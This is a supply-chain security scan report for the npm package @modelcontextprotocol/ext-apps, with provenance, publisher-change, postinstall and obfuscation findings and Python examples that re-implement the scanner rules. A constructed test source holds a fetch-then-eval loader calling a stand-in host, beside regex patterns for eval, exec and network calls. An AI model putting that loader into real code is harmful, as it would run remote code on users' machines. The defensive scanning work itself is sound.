@modelcontextprotocol/ext-apps

Versions: 17
License:
Install Scripts: No
Provenance: Verified

Supply chain provenance

Status for the latest visible version.

Checks passed: SLSA provenance attestation; npm registry signatures; gitHead linked
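The three checks above are things a consumer can redo locally, and the page itself does not show how. The following is an added example (not the scanner's code and not from the ext-apps project) that reads a SLSA v1 provenance attestation in the shape the npm registry serves from its `/-/npm/v1/attestations/<name>@<version>` endpoint, pulls out the attested source repository, commit and workflow, and compares the commit with the packument's `gitHead`; that comparison is assumed to be what the "gitHead linked" badge means. The attestation document below is constructed for the demo, the repository, commit and workflow path are placeholders, and no Sigstore signature is verified here.

```python
"""Offline inspection of an npm SLSA provenance attestation.

Added example; not the scanner's code and not from the ext-apps project.
The attestation document is CONSTRUCTED to follow the shape the registry
returns from /-/npm/v1/attestations/<name>@<version>: a list of attestations,
each a Sigstore bundle whose DSSE payload is a base64 in-toto Statement.
Repository, commit and workflow values are placeholders, and no signature is
verified here (`npm audit signatures` does that part against the trust root).
"""
import base64
import json

SLSA_V1 = "https://slsa.dev/provenance/v1"
PUBLISH_V01 = "https://github.com/npm/attestation/tree/main/specs/publish/v0.1"
IN_TOTO = "application/vnd.in-toto+json"
GITHUB_HOSTED = "https://github.com/actions/runner/github-hosted"


def build_sample_attestations(repo, commit, workflow_path):
    """Constructed registry response: an npm publish attestation plus a SLSA v1 one."""
    statement = {
        "_type": "https://in-toto.io/Statement/v1",
        "subject": [{"name": "pkg:npm/%40modelcontextprotocol/ext-apps@1.7.3",
                     "digest": {"sha512": "00" * 64}}],  # placeholder tarball digest
        "predicateType": SLSA_V1,
        "predicate": {
            "buildDefinition": {
                "buildType": "https://slsa-framework.github.io/github-actions-buildtypes/workflow/v1",
                "externalParameters": {"workflow": {
                    "ref": "refs/heads/main",
                    "repository": f"https://github.com/{repo}",
                    "path": workflow_path}},
                "resolvedDependencies": [{
                    "uri": f"git+https://github.com/{repo}@refs/heads/main",
                    "digest": {"gitCommit": commit}}],
            },
            "runDetails": {"builder": {"id": GITHUB_HOSTED}},
        },
    }
    payload = base64.b64encode(json.dumps(statement).encode()).decode()
    envelope = {"payloadType": IN_TOTO, "payload": payload, "signatures": [{"sig": "<unverified>"}]}
    return {"attestations": [
        {"predicateType": PUBLISH_V01,
         "bundle": {"dsseEnvelope": {"payloadType": IN_TOTO, "payload": "e30=", "signatures": []}}},
        {"predicateType": SLSA_V1, "bundle": {"dsseEnvelope": envelope}},
    ]}


def extract_slsa_provenance(doc):
    """Repo, ref, workflow, commit and builder from the SLSA v1 statement; None if absent."""
    for att in doc.get("attestations", []):
        if att.get("predicateType") != SLSA_V1:
            continue  # the separate npm "publish" attestation is not what we want here
        env = att["bundle"]["dsseEnvelope"]
        if env.get("payloadType") != IN_TOTO:
            raise ValueError(f"unexpected payloadType {env.get('payloadType')!r}")
        stmt = json.loads(base64.b64decode(env["payload"]))
        if stmt.get("predicateType") != SLSA_V1:
            raise ValueError("statement predicateType disagrees with the attestation wrapper")
        build = stmt["predicate"]["buildDefinition"]
        workflow = build["externalParameters"]["workflow"]
        commit = next((d["digest"].get("gitCommit") for d in build.get("resolvedDependencies", [])
                       if d.get("uri", "").startswith("git+https://github.com/")), None)
        return {
            "repo": workflow["repository"].removeprefix("https://github.com/"),
            "ref": workflow["ref"],
            "workflow": workflow["path"],
            "commit": commit,
            "builder": stmt["predicate"]["runDetails"]["builder"]["id"],
        }
    return None


def check_version(doc, git_head, expected_repo, expected_builder=GITHUB_HOSTED):
    """Policy gate. Returns a list of finding strings; an empty list means the version passes."""
    prov = extract_slsa_provenance(doc)
    if prov is None:
        return ["no SLSA provenance attestation (the LOW finding on this page)"]
    findings = []
    if prov["repo"] != expected_repo:
        findings.append(f"provenance repo {prov['repo']} != expected {expected_repo}")
    if prov["builder"] != expected_builder:
        findings.append(f"unexpected builder {prov['builder']}")
    if prov["commit"] is None:
        findings.append("provenance carries no source commit digest")
    elif git_head != prov["commit"]:
        findings.append(f"packument gitHead {git_head} != attested commit {prov['commit']}")
    return findings


if __name__ == "__main__":
    commit = "a" * 40  # placeholder commit id
    doc = build_sample_attestations("modelcontextprotocol/ext-apps", commit, ".github/workflows/publish.yml")
    print(extract_slsa_provenance(doc))
    print("pass:", check_version(doc, commit, "modelcontextprotocol/ext-apps"))
    print("mismatch:", check_version(doc, "b" * 40, "modelcontextprotocol/ext-apps"))
    print("none:", check_version({"attestations": []}, commit, "modelcontextprotocol/ext-apps"))
```

Against the real package the inputs come from `npm view @modelcontextprotocol/ext-apps@1.7.3 gitHead dist.attestations` and the attestations endpoint named above; `npm audit signatures` in a project that depends on the package verifies the registry signature and the attestation signature themselves. The caveat to keep in mind when reading the INFO findings below: provenance binds the tarball to a source commit and a CI workflow, which rules out a tarball published from a laptop or a stolen npm token, but it says nothing about whether that commit is benign. A maintainer whose GitHub account is compromised still produces valid provenance.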

Maintainers

jspahrsummers, pcarleton, fweinberger, thedsp, ashwin-ant, ochafik-ant

Accepted risks

Findings the reviewer chose to accept rather than block on.

Source | Rule | Reason | Accepted by | When
source-diff | net-exec-file: dist/src/server/index.js | AI (source-diff): PostMessageTransport class using window.postMessage — standard browser IPC, not exfiltration. | ai |
source-diff | net-exec-file: dist/src/app-with-deps.js | AI (source-diff): Bundled Zod+MCP SDK code; network/exec patterns are from postMessage transport and schema validation, not malware. | ai |
source-diff | net-exec-file: dist/src/react/react-with-deps.js | AI (source-diff): Same bundled MCP transport + Zod patterns as app-with-deps. Legitimate browser messaging code. | ai |
source-diff | obfuscated-file: dist/src/app-with-deps.js | AI (source-diff): Bundled output from esbuild containing Zod + MCP SDK; '-with-deps' exports are documented in package.json. Standard minification, not obfuscation. | ai |
source-diff | obfuscated-file: dist/src/react/react-with-deps.js | AI (source-diff): Bundled React+Zod+MCP SDK output for the react-with-deps export. Standard esbuild minification. | ai |
source-diff | obfuscated-file: dist/src/server/index.js | AI (source-diff): Bundled server module with MCP SDK protocol handling. Standard esbuild minification output. | ai |
phantom-deps | phantom-dep:prettier | AI (phantom-deps): prettier is used as a CLI tool in npm scripts (generate:schemas, prettier:fix), not via JS import. Stable false positive. | ai |
install-scripts | install-script:postinstall | AI (install-scripts): Postinstall runs setup-bun.mjs to bootstrap Bun runtime used by the build system; graceful fallback with || echo. Consistent with @oven/bun-* optional deps. | ai |
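The table accepts three rule families (obfuscated-file, net-exec-file, phantom-dep) on the grounds that a minified esbuild bundle and a CLI-only dev dependency trip the same patterns a loader would. The following added example, which is not the scanner's code and not from the ext-apps project, re-implements those rules as the finding text on this page describes them (any line over 3000 chars; network calls plus dynamic code execution in one file; a declared dependency never imported) and adds the two triage checks the reviewer's reasons rely on: whether the flagged file is a documented export in package.json, and whether the phantom dependency appears as a command in npm scripts. Thresholds and regexes are assumptions, and the package.json and source files are constructed for the demo rather than copied from the real package.

```python
"""Re-implementation of the obfuscated-file, net-exec-file and phantom-dep
rules, plus the triage checks a reviewer applies before accepting them.
Added example; not the scanner's own code and not from the ext-apps project.
Thresholds, regexes and the package.json / sources below are ASSUMED or
CONSTRUCTED to match the finding text on the page, not the real package.
"""
import re

MAX_LINE_CHARS = 3000  # "lines over 3000 chars" per the obfuscated-file findings

NET_RE = re.compile(r"\b(?:fetch|XMLHttpRequest|WebSocket|postMessage)\s*\(|\bhttps?\.request\s*\(")
EXEC_RE = re.compile(r"\b(?:eval|Function|exec|execSync|spawn|spawnSync)\s*\(")
IMPORT_RE = re.compile(r"""(?:\bfrom\s+|\brequire\s*\(\s*)["']([^"'./][^"']*)["']""")


def is_obfuscated(src):
    return any(len(line) > MAX_LINE_CHARS for line in src.splitlines())


def has_net_and_exec(src):
    return NET_RE.search(src) is not None and EXEC_RE.search(src) is not None


def export_targets(pkg):
    """Every file path reachable from package.json "main" or "exports" (any nesting)."""
    paths = set()

    def walk(node):
        if isinstance(node, str):
            paths.add(node.removeprefix("./"))
        elif isinstance(node, dict):
            for child in node.values():
                walk(child)

    walk(pkg.get("exports", {}))
    if "main" in pkg:
        paths.add(pkg["main"].removeprefix("./"))
    return paths


def module_name(specifier):
    """'@scope/pkg/sub' -> '@scope/pkg', 'pkg/sub' -> 'pkg'."""
    parts = specifier.split("/")
    return "/".join(parts[:2]) if specifier.startswith("@") else parts[0]


def phantom_deps(pkg, sources):
    """Declared deps never imported; tell CLI-only use (npm scripts) from truly unused."""
    declared = set(pkg.get("dependencies", {})) | set(pkg.get("devDependencies", {}))
    imported = {module_name(m) for src in sources.values() for m in IMPORT_RE.findall(src)}
    script_tokens = {tok for cmd in pkg.get("scripts", {}).values() for tok in re.split(r"[\s&|;]+", cmd)}
    return {dep: ("cli-in-scripts" if dep in script_tokens else "unused")
            for dep in sorted(declared - imported)}


def scan(pkg, sources):
    """Findings as dicts; `documented` is the triage hint, not a verdict."""
    exported = export_targets(pkg)
    findings = []
    for path, src in sources.items():
        for rule, fired in (("obfuscated-file", is_obfuscated(src)), ("net-exec-file", has_net_and_exec(src))):
            if fired:
                findings.append({"rule": rule, "target": path, "documented": path in exported})
    for dep, why in phantom_deps(pkg, sources).items():
        findings.append({"rule": "phantom-dep", "target": dep, "documented": why == "cli-in-scripts"})
    return findings


# Constructed package.json: the exports map and scripts are illustrative, not the real file.
PACKAGE_JSON = {
    "name": "@modelcontextprotocol/ext-apps",
    "exports": {".": "./dist/src/index.js",
                "./app-with-deps": "./dist/src/app-with-deps.js",
                "./server": "./dist/src/server/index.js"},
    "scripts": {"build": "esbuild src/app.ts --bundle --outfile=dist/src/app-with-deps.js",
                "generate:schemas": "node scripts/gen.mjs && prettier --write src/generated",
                "prettier:fix": "prettier --write ."},
    "dependencies": {"zod": "^3.0.0"},
    "devDependencies": {"esbuild": "^0.24.0", "prettier": "^3.0.0"},
}

# Constructed sources. The bundle is one 9000+ char line with a globalThis shim
# (Function("return this")) and a postMessage call, enough to trip both rules;
# the helper is a textbook fetch-then-eval loader on a path nothing exports.
SOURCES = {
    "dist/src/index.js": 'import { z } from "zod";\nexport const Msg = z.object({ id: z.string() });\n',
    "dist/src/app-with-deps.js": ('var g=typeof globalThis<"u"?globalThis:Function("return this")();'
                                  + ";".join(f"var v{i}=function(){{return {i}}}" for i in range(300))
                                  + ';g.parent.postMessage({jsonrpc:"2.0"},"*");\n'),
    "dist/src/helper.js": 'fetch("https://example.invalid/stage2").then(r => r.text()).then(code => eval(code));\n',
}

if __name__ == "__main__":
    for finding in scan(PACKAGE_JSON, SOURCES):
        print(finding)
```

Run on the constructed inputs, the bundle and the loader trip the same net-exec-file rule; only the export check separates them, which is why these rules sort files into "needs a look" rather than "malicious". A documented export explains why a large bundled file exists, not what is in it, so the accept decisions in the table are best backed by rebuilding the tarball from the commit named in the provenance attestation and diffing it against what the registry serves; an attacker who controls the publish workflow can ship a documented export too.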

Versions (showing 17 of 17)

Version Deps Published
1.7.3 1 / 30
1.7.2 1 / 30
1.7.1 1 / 30
1.7.0 1 / 30
1.6.0 0 / 30
1.5.0 0 / 30
1.4.0 0 / 30
1.3.2 0 / 30
1.3.1 0 / 30
1.1.1 0 / 29
0.2.2 1 / 19
0.2.1 1 / 19
0.2.0 1 / 19
0.1.0 4 / 15
0.0.7 4 / 13
0.0.6 4 / 13
0.0.1 5 / 12

v1.7.3

1 finding
INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.7.2

1 finding
INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.7.0

1 finding
INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.0

1 finding
INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.5.0

1 finding
INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.4.0

1 finding
INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.3.2

1 finding
INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.3.1

7 findings
HIGH [provenance] Publisher changed: pcarleton → ochafik (on 2026-03-23)

This version was published by a different npm account than previous versions on 2026-03-23. This could indicate a legitimate maintainer transition or an account compromise.

HIGH [source-diff] New obfuscated file: dist/src/app-with-deps.js

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH [source-diff] New file with network + code execution: dist/src/app-with-deps.js

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

HIGH [source-diff] New obfuscated file: dist/src/server/index.js

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH [source-diff] New obfuscated file: dist/src/react/react-with-deps.js

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH [source-diff] New file with network + code execution: dist/src/react/react-with-deps.js

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.1.1

9 findings
HIGH [install-scripts] Package has 'postinstall' script

Script: node scripts/setup-bun.mjs || echo 'setup-bun.mjs failed or not available'

HIGH [provenance] Publisher changed: pcarleton → ochafik (on 2026-02-24)

This version was published by a different npm account than previous versions on 2026-02-24. This could indicate a legitimate maintainer transition or an account compromise.

HIGH [source-diff] New obfuscated file: dist/src/app-with-deps.js

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH [source-diff] New file with network + code execution: dist/src/app-with-deps.js

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

HIGH [source-diff] New obfuscated file: dist/src/server/index.js

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH [source-diff] New file with network + code execution: dist/src/server/index.js

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

HIGH [source-diff] New obfuscated file: dist/src/react/react-with-deps.js

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH [source-diff] New file with network + code execution: dist/src/react/react-with-deps.js

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
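The publisher-change and postinstall findings in the v1.1.1 and v1.3.1 blocks above come from per-version fields the registry exposes in the packument (`versions[v]._npmUser.name`, `versions[v].scripts`, `maintainers`). The following added example, which is not the scanner's code, shows the detection for both and the first triage step for a publisher change, namely whether the new publisher is in the package's maintainers list. The packument below is constructed: field names follow the registry format, but the version set, usernames and script text are sample data arranged to resemble this page's findings, not real registry data.

```python
"""Publisher-change and install-script checks over an npm packument.

Added example; not the scanner's code. PACKUMENT is CONSTRUCTED: the field
names match the registry format (versions[v]._npmUser.name, versions[v].scripts,
maintainers) but the versions, usernames and dates are sample data.
"""

# Hooks that run when a consumer installs the published tarball. "prepare" is
# deliberately left out: it runs for git dependencies and in-repo installs, not
# for tarballs fetched from the registry.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

PACKUMENT = {
    "name": "@modelcontextprotocol/ext-apps",
    "maintainers": [{"name": "pcarleton"}, {"name": "ochafik"}],
    "versions": {
        "0.2.2": {"_npmUser": {"name": "pcarleton"},
                  "scripts": {"postinstall": "node scripts/setup-bun.mjs || echo 'setup-bun.mjs failed or not available'"}},
        "1.1.1": {"_npmUser": {"name": "ochafik"},
                  "scripts": {"postinstall": "node scripts/setup-bun.mjs || echo 'setup-bun.mjs failed or not available'"}},
        "1.3.2": {"_npmUser": {"name": "ochafik"}, "scripts": {"build": "tsc -p ."}},
        "1.7.3": {"_npmUser": {"name": "ochafik"}, "scripts": {}},
    },
}


def semver_key(version):
    """Sort key on the numeric core; build metadata and prerelease tags are ignored."""
    core = version.split("+")[0].split("-")[0]
    return tuple(int(part) for part in core.split("."))


def ordered_versions(packument):
    # Semver order is used here for brevity. A real scanner should order by
    # packument["time"] (publish timestamps): a backport such as 1.3.2 can be
    # published after 1.7.0, and "previous version" means previous in time.
    return sorted(packument["versions"], key=semver_key)


def publisher_changes(packument):
    """One record per version whose _npmUser differs from the previous version's."""
    listed = {m["name"] for m in packument.get("maintainers", [])}
    changes, previous = [], None
    for version in ordered_versions(packument):
        user = packument["versions"][version].get("_npmUser", {}).get("name")
        if previous is not None and user != previous:
            changes.append({"version": version, "from": previous, "to": user,
                            "listed_maintainer": user in listed})
        previous = user
    return changes


def install_scripts(packument, hooks=INSTALL_HOOKS):
    """(version, hook, command) for every lifecycle script that runs on install."""
    hits = []
    for version in ordered_versions(packument):
        scripts = packument["versions"][version].get("scripts", {})
        for hook in hooks:
            if hook in scripts:
                hits.append((version, hook, scripts[hook]))
    return hits


def review(packument):
    """Severity-tagged findings in the style of the page."""
    findings = []
    for change in publisher_changes(packument):
        note = "listed maintainer" if change["listed_maintainer"] else "NOT a listed maintainer"
        findings.append(("HIGH", change["version"],
                         f"publisher changed {change['from']} -> {change['to']} ({note})"))
    for version, hook, cmd in install_scripts(packument):
        findings.append(("HIGH", version, f"{hook} script: {cmd}"))
    return findings


if __name__ == "__main__":
    for severity, version, text in review(PACKUMENT):
        print(severity, version, text)
```

The real document comes from `https://registry.npmjs.org/@modelcontextprotocol%2Fext-apps` (or `npm view @modelcontextprotocol/ext-apps --json` for most of the same fields). Two caveats a consumer will want. First, a new publisher who is also a listed maintainer is the expected shape of a maintainer transition, but the maintainers list is itself registry-controlled metadata, so the stronger check is that the provenance attestation for the new version still points at the same repository and workflow as before. Second, the page's postinstall reasoning explains that the script bootstraps the Bun runtime for the build system, which a consumer of a published tarball never needs; `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) neutralises it, and the `|| echo` fallback means a failed download would otherwise pass silently. The latest visible version reports no install scripts, so this only matters when pinning 0.2.x or 1.1.1.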

v0.2.2

2 findings
HIGH [install-scripts] Package has 'postinstall' script

Script: node scripts/setup-bun.mjs || echo 'setup-bun.mjs failed or not available'

INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v0.2.1

2 findings
HIGH [install-scripts] Package has 'postinstall' script

Script: node scripts/setup-bun.mjs || echo 'setup-bun.mjs failed or not available'

INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v0.2.0

2 findings
HIGH [install-scripts] Package has 'postinstall' script

Script: node scripts/setup-bun.mjs || echo 'setup-bun.mjs failed or not available'

INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v0.1.0

1 finding
INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v0.0.7

1 finding
INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v0.0.6

1 finding
INFO [provenance] Has SLSA provenance attestation

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v0.0.1

1 finding
LOW [provenance] No provenance attestation

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.